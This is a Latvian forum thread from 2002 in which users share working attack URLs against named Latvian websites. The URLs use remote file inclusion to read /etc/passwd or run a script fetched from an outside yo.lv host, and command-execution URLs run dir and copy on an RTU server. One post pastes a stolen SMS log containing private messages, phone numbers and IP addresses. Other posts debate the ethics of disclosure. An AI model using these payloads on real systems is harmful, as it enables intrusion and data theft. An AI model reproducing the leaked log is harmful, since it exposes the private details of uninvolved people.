Juris raksta:
listee paraadiijaas adresiite no Roze :
http://www.teicija.lv/index.php3?/etc/passwd
uzcepu scriptinju uz Yo.lv servaka :
mazs browseriits 🙂
http://www.teicija.lv/index.php3?http://maitasputns.yo.lv…
Rezultāta tas izskatās šādi teicija.lv.
No sevis pievienošu vēl vienu bildi jeb Poda jauno apvalku Pods Hot. Manuprāt skaisti. Var arī citus pamēģināt http://www.teicija.lv/index.php3?https://pods.lv, http://www.plosti.lv/index.php3?https://pods.lv un http://www.fligelis.lv/index.php3?https://pods.lv.
Ja nemaldos, tad tas viss saucas Cross Site Scripting, kad vienā lapā var iekļaut skriptus no citas lapas…
Bet pats sliktākais šajā visā pasākumā ir tas, ka paši autori ir izstrādājuši šīs lapas balstoties uz Cross Site Scripting principa, jo saites tiek liktas šādā līkā veidā. Ilustrācijai *parasta* saite pirmajā lapā. Tā kā, draugi mīļie, te nav nekādas hakošanas vai krakošanas, ja reiz autori paši tādas lietas taisa. Tie ir vienkārši apvalki jeb skini jūsu lapām 🙂
Nu veel labaak!!!
http://www.teicija.lv/inde x.php3?http://maitasputns.yo.lv/out.inc?yo=/home/t/teicija/public_html/sm.txt
jaaa, par SMS es ar pasmejos… bet uztaisiju labaaku scriptinju : URL jaraxta ir nevis test.inc, a test1.inc
smuki uztaisa koku ar URLiem…
http://www.teicija.lv/info.php3
lai gan admins pamaniijaas etc/passwd nogriezt tomeer stradaat ar sho webu veel var
wispaar jau prickoliigi
vinjsh nevar neko nogriezt … jo buus jaapartaisa visi taa saucaamie “portaali” 🙂
PS: http://www.teicija.lv/index.php3?http://maitasputns.yo.lv/test1.inc?yo =/home
Nu izkataas ka nogrieza.
Nu tagad var:
http://www.teicija.lv /index.php3?sm.txt
Ja kaadam neiet tad rezultaats ir:
27/12/2002 ;195.13.156.137 ;luzd02.sic.lu.lv ;371bdfbs ;saefdsafd 27/12/2002 ;195.13.254.67 ;195.13.254.67 ;371hgf ;hfghf 27/12/2002 ;195.13.156.137 ;luzd02.sic.lu.lv ;3717393939 ;tagad visi var redzet shito sms, kuru es suutu! zajebis 27/12/2002 ;195.13.156.137 ;luzd02.sic.lu.lv ;3719765297 ;shis ir tests 26/12/2002 ;80.232.164.114 ;80.232.164.114 ;3716397311 ;mīlu 26/12/2002 ;81.198.17.35 ;81.198.17.35 ;3716594820 ;ghhhhhhghghghghghghgh 26/12/2002 ;217.198.224.134 ;cm134.btv.lv ;3719658785 ;Kā ar veselibu? 24/12/2002 ;195.62.157.118 ;195.62.157.118 ;3716491175 ;Gundega, ja vari tad atzvani par to pasaakumu 23/12/2002 ;195.62.157.118 ;195.62.157.118 ;3716528599 ;chau kaa iet , te ugis , vai tev Inci ir kaada kapeika? 23/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719484729 ;Aigar, vai tu essi Madonaa, un vai tevi var riit satikt riita pusee. Ugis 20/12/2002 ;195.62.157.118 ;195.62.157.118 ;3716479827 ;Labs vakars no teicijas. Juus esat internetaa, apsveicu! Ugis – Teicija 20/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719479139 ;Te no Teicijas Ugis. Atsuuti luudzu uz teicija@teicija.lv visu par sacensiibaam 19/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719692315 ;kur kavejaties, gaidam maija 19/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716210447 ;Uzrakstīju visus gadus,varbūt noder.Ja sanjeemi,uzpīkstini.Veiksmi!Inese 19/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716210447 ;Gailis-21,33,45,57,69,81,93.Suns-22,34,46,58,70,82,94.Cūka-23,35,47,5 9,71,83,95. 19/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716210447 ;Zirgs-30,42,54,66,78,90.Kaza-31,43,55,67,79,91.Peertikjis-20,32,44,56 ,68,80,92. 19/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716210447 ;Kakjis-27,39,51,63,75,87.Pūkjis-28,40,52,64,76,88.Cjūska-29,41,53,65, 77,89. 19/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716210447 ;Zurka-1924.,36,48,60,72,84.Veersis-25,37,49,61,73,85.Tīgjeris-26,38,5 0,62,74,86. 17/12/2002 ;159.148.11.2 ;maxim.mauer.lv ;3719758155 ;jjkljkljkljkkjkjlj 17/12/2002 ;213.175.87.184 ;213.175.87.184 ;3716201418 ;atsaucies! indra 16/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719692315 ;kana 12/12/2002 ;194.19.253.25 ;194.19.253.25 ;3716519674 ;test 11/12/2002 ;159.148.235.100 ;proxy.ru.lv ;3716363694 ;Kaa iet shai tumshajaa dienaa? Vai sanjeemi manu sms no Interneta? Uzpiikstini! Miilu! 11/12/2002 ;195.244.155.162 ;195.244.155.162 ;3719465695 ;Sveiciens no Madonas! 10/12/2002 ;194.19.231.226 ;teledialogs-cc0.telia.lv ;3719438078 ;cau teeti iedod luudzu naudu pusdienaam 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3719810464 ;Hey-hey-hey!A, es tulit jau ielas do$os!Sejaa smaids un soli$i raiti!:)Lai tev jaux vakars un $o to ari pamacies! Ataaa! 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3719771673 ;Cau,Rasma!Ka labi arhivaa dzelas?Neesi jau ierakusies lielajos puteklos?:)Nu tad 4dien 17.15 pie katedrales!Smaidinu!Rim 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3719847011 ;Hello, Ninna!:)Kur tu esi pazudusi un kura pasaules mala atrodies?Kapec nedod par sevi nekadu zinu?Jauku vakaru!:) Husta 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3719810464 ;Ha-haa!Nu tu mani uzjautrinaji! 3.STAVAA?!?Tev “veicaas”!:) Vai tik` tavs draugs nebus gajis pa kadiem neceliem?!:) Ataa 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3716558365 ;Nu, kas te tie par tadiem datora IP! Smaidinu! 10/12/2002 ;195.122.30.196 ;195.122.30.196 ;3719810464 ;Cau, milais!Cik noprotu nevienu sms neesi sanemis!:( Galvenais jautajums bija:”Ka ar locitavam un du$u?”:) Jauku dienu!L 09/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719692315 ;ccau 09/12/2002 ;159.148.59.61 ;159.148.59.61 ;3716553405 ;chau! 09/12/2002 ;80.232.164.99 ;80.232.164.99 ;3716334719 ;Cau,atpuutniece!Kaadu jauku briinumu shonedeel!Bija jauki Saules ielaa atkal.Tev taisniiba bija.Ineta 09/12/2002 ;80.232.164.99 ;80.232.164.99 ;3716782459 ;Cau,atpuutniece!Kaadu jauku briinumu shonedeel!Bija jauki Saules ielaa atkal.Tev taisniiba bija.Ineta 08/12/2002 ;80.232.211.228 ;80.232.211.228 ;3719484729 ;jkabds 08/12/2002 ;195.2.124.246 ;195.2.124.246 ;371 ; 08/12/2002 ;80.232.211.228 ;80.232.211.228 ;3719484729 ;Sveicinaats aigar raksti mani shaadi analog drusku saiisinaaju analog un ieved sarakstu isalonaa.. 07/12/2002 ;195.62.157.118 ;195.62.157.118 ;3719692315 ;Sveiks , Pedro 07/12/2002 ;213.190.135.241 ;213.190.135.241 ;3719794271 ;Es te tik meiginju suutit zinju . Ilona Ja sanaaks zvaniishu pec 50min 07/12/2002 ;195.216.187.20 ;195.216.187.20 ;3716446027 ;Chau!Pabaro manu ziloniiti!!!Luuuudzu!!! 07/12/2002 ;80.232.181.68 ;80.232.181.68 ;3719692315 ;Cau atzvani ja esi maajaas archijss vai brauksi uz cesvaini? 06/12/2002 ;62.85.48.141 ;62.85.48.141 ;3719294113 ;Kas būs?Ko saņemšu/ēeeīiiūuu 06/12/2002 ;62.85.48.141 ;62.85.48.141 ;3716406309 ;Sveika,zinjas sanjeemu,paldies.Zalves Jurim tiks pa bikseem.Par Cesvaini esmu shokaa. 06/12/2002 ;213.175.87.184 ;213.175.87.184 ;3719692315 ;aizraksti uz lielajiem delfi un apollo par akciju 06/12/2002 ;213.182.193.101 ;mpe3-101.mpe.lv ;371 ; 06/12/2002 ;19
waaa, nu spamot gana nevajag!!
nav nekas pieverts, piekljuve caur jebkuru portalu 🙂
PS: http://www.kapa.lv/jaunumi/kapa.php3?http://maitasputns.yo.lv/test1.in c?yo=/home
Turklat tas ir LatNet serveris… rausis.latnet.lv… un piekluut tiesham var no jebkura cita portala… piemeram http://www.plosti.lv/index.php3?http://maitasputns.yo.lv/test1.inc?yo= /etc/passwd
Sorry, sajaucu linku…
http://www.plosti.lv/index.php3?/etc/passwd
mana pieeja shajaa situaacijaa kaa shiis informaacijas pamatavotam ir taada, ka nevajadzeetu njirgaaties par cilveekiem, bet gan paliidzeet jebkaadaa veidaa.
nu tak tieshaam jautri…
ne jau tas liikais php, bet tas ka rausis valjaa!
visi latnet klienti, johaidii. mysql passwordi..
njemam phpmyadmin, un.. truba:)
Re ko noziimee ‘shared hosting’, exploito vienu, un…
tjipa “1 za vseh i vse za odnogo”, ka bij padomju laikaa
nu man arii tur viens tautaa diezgan populaars satinjsh, ko es ‘tehniski pieskatu’, nesen paarlika uz latnetu no mediaparka. to labaak neaiztieciet.
neviens nenjirgaajaas… lai taisa jau to include…
bet ne jau shaadaa veidaa : incluudo kas noraadiits (labi ja html incluudo, bet arii php paarsee).
galvenais ir taadi vairaaki portali kas uz taa griezhaas (tai pashaa serveriitii)… nu tas pa traku.
PS: pirms lapu raadiit tautai, taa jaanocheko uz bugiem un t.t… bet bugi ir vienmer :_)
nu jau gan aizraavaaties ..
shitais gljuks jau bija zinaams briidii, kad nodega Cesvaines pils, vismaz man .. atshkjiriibaa no dazha laba, es uzreiz neskreeju uz podu un nebljaavu, ka redz, esmu KEWL haXorZ, ka reku luku viens ir dumaaks par mani .. bet pabriidinaaju autoru .. tas, ka vinsh kljuudas neizlaboja jau ir vinja probleema ..
vaidzeetu aizdomaaties arii kaadreiz par to, kaadas jums buutu izjuutas shaados gadiijumos ..
sorry, ja baigi pareizi, ir tachu Z-Sveetki .. jaabuut labiem, miiljiem .. a juus te 🙁 .. 😀 😀 😀
Šajā gadījumā nav te nekāds cross site scripting (XSS), bet gan vienkārši nepareiza konfigurācija un kods. XSS rodas situācijās, kad skripts tiek injicēts lapā izmantojot, piemēram, meklēšanas servisu. Piemēru var skatīt kaut vai Jippii.lv lapā:
http://www.jippii.lv/lv/gsm/search/logo/?query=%3Cscript%3Eal ert%28%22XSS%22%29%3C%2Fscript%3E
Kaklz, bet tagad tachu tu naac uz podu un bljauj ka esi k3wlais haxorz 🙂
ņā…
P.S. tas urlis ir bez atstarpes
Un kapec tadas lietas ir jaapadara publiskas? Vai kāds ir briidiaajis adminus? Manupraat blaustiities pa pasauli par sitaadiem glukiem var taadaa gadiijuma, ja ir ZERO reakcija no resursa uztureetaajiem.
edc, nu tak tikko k3wlais haxorz Kaklz teica, ka ir informeejis autorus un ir bijis zero response, taa ka viss ir normaali.
izstaas ka kewlais autors ir diezgan nekuuligs iisteniibaa
neslikti..
Pow: es te nepretendeeju uz kaut kaadu tevis piedeeveeto titulu, tachu man liekas mazliet stulbas shitaas izdariibas, kad vesels bars cilveecinju priecaajas un bljauj un stulbi izreec kaada cita cilveeka nezinaashanu ..
ja nu kas, tad iemetam arii pirmo response no autora peec kljuudas pazinjoshanas:
“5.Dec.2002:
Ingus liels paldies par pamaaciibu, iisteniibaa es zinaaju, ka ir lietas kas
ir neizbeegamas laikautko labotui, Teicijas portaala sisteemu es izdomaaju
pats kaa azartisks interneta apgiuveejs, man nav spec izgliitiibas un es
visu esmu apguvis kaa autodidakts un esmu tipisks ssi liimenja paarstaavis,
es kljuudu esmu sapratis un daljeeji jau par to zinaaju, rtaccu juutu, ka
strauji taa teicija attistaas
Probleema ir taada ka nav taa laika saviest kaartiibu.. ”
taa luuk .. 😉
Es nezinu, vai shim krutajam hackerim ir lieli mazveertiibas kompleski vai kas… Blj, buutu delfi.lv uzlauzushi tad vareetu priecaaties, bet nee, panjem kaadu nezinaamu, nekomerciaalu lapu. “Uzlauzh”, bljaustaas pa visu netu un juutas kruti. Un pods tishaam ir pods, ja jau shitaadus meeslus nav kauns publiceet.
to coolynx: a tev nav kauns citu priekshaa shitaadu huinju publiceet?
es tomeer atljaushos iemest sho linku
http://eskazki.front.lv/tail.php?id=26
teemas turpinaajums, kaa nekaa
😀
http://www.rtu.lv/scripts/cmd1.exe?/c+dir+c:
to portoss: neviens jau nenijrgaajaas… ir jau OK lapa bet besii aaraa, ka taisa dahuja portaalu uz taadas engines (nepaarbaudiitas)… “pospeshish, ljudej nasmeshish”.. vo.
un neviens jau nebljaustaas – zinaaja tikai Delfi liste un
pods.lv ( man liekas pods.lv arii tam domaats, jo [varbut arii enpamaniiji??] augshaa ir taa saucaamaa sadalja “hack”)
Taa kaa ir baiss slinkums u.c. sveetku izrietoshas lietas, tad parposteeju savu mailu no weblistes:
> Vispaar jau skumji paveerot, kaada ir latvijas webistu kultuura.
Nu principaa kaa jau dazhi cilveeki teica taa iespeejams nav tikai webistu bet gan latvieshu mentalitaate pashaa pamataa.. 🙂
> Vai jums neliekas, ka atrodot kaadu caurumu vislabaak buutu par to
> privaati uzmailot lapas adminam, nevis ziimeeties ar to cik kruts
> “HackerZ” nu katrs ir, un izlasiijushi listee par caurumu nu maitaa
> ko var samaitaat.
Uz sho lietu var skatiities dazhaadi: protams ir slikti ja cilveeks kaut ko shaadu atrodot/pamanot peekshnji iedomaajas ka ir sasniedzis “hakereeshanas” kalngalus un kljuvis par uberguru.. Bet no otras puses, shaadi piemeeri kaut vai for fun (kaa manupraat bija arii shajaa reizee) kaut arii saapiigi, ljauj maaciities gan pashas lapas autoriem gan arii citiem kas sho listi lasa, lai peecaak nekljuutu par kaut kaadu braziilju script kiddies defeisa upuriem 🙂
No vienas puses itkaa jau bojaajas reputaacija, bet no otras puses kaadreiz neapzinaati vai nezinaashanas deelj kljuudaas visi un bugi ir neizbeegama lieta, taa arii pieraadot darba deveejiem (web/it kompanijaam) un pakalpojumu izmantotaajiem ka “uzcept” funkcionaalu un reizee droshu produktu nemaz nav tik vienkaarshi, liidz ar to par to var prasiiit krietnu samaksu.
> Ja uz ielas redzeesiet neaizsleegtu auto, vai tas arii buus iemesls,
> lai zagtu magji, ar domu, ja jau iipashnieks taads cirvis, ka nerubii
> aizsleegt auto, nu tad taa vinjam arii vajag.
Shajaa gadijumaa izraut magji un iemest vinju bagazhniekaa 😉 Naakoshajaam reizeem..
p.s. zsveetku vecha maisaa reidzeem meedz buut arii zhagari
ljur ljur taalaak …
Laimiigu Jauno Gadu cuukas.
REKLĀMA: APMEKLĒJIET VISUMA DISPIČERU UN UNIKALITĀTES KALNGALU JEY ZEE ( HTTP://WWW.JEYZEE.YO.LV/ )
jeyZEE
Hmz.. kads varetu pameginat uzlauzt manu saitu.. Vai ari www.mvm.lv. Hosts viens un tas pac. Es nelaunosos, backups man ir, tikai gribas zinat, vai neesmu kaut kur kadu caurumu atstajis. Es kaa nekaa Linuxu tikko tik saku apgut un php tapat…
Nu es uzskatu pods.lv par pods.lv 🙂
Un. Uzskatu ka šis psts manā izpratnē bij’ “pareizs” …
p.s. pareizs!
ManInBlack: Nu ja Jūs tik laipni atļaujat :)))) …
http://www.rtu.lv/scripts/cmd1.exe?/c+copy+c:installwww_rtu_old.ra r+c:installkukuu.rar
kursiņš 🙂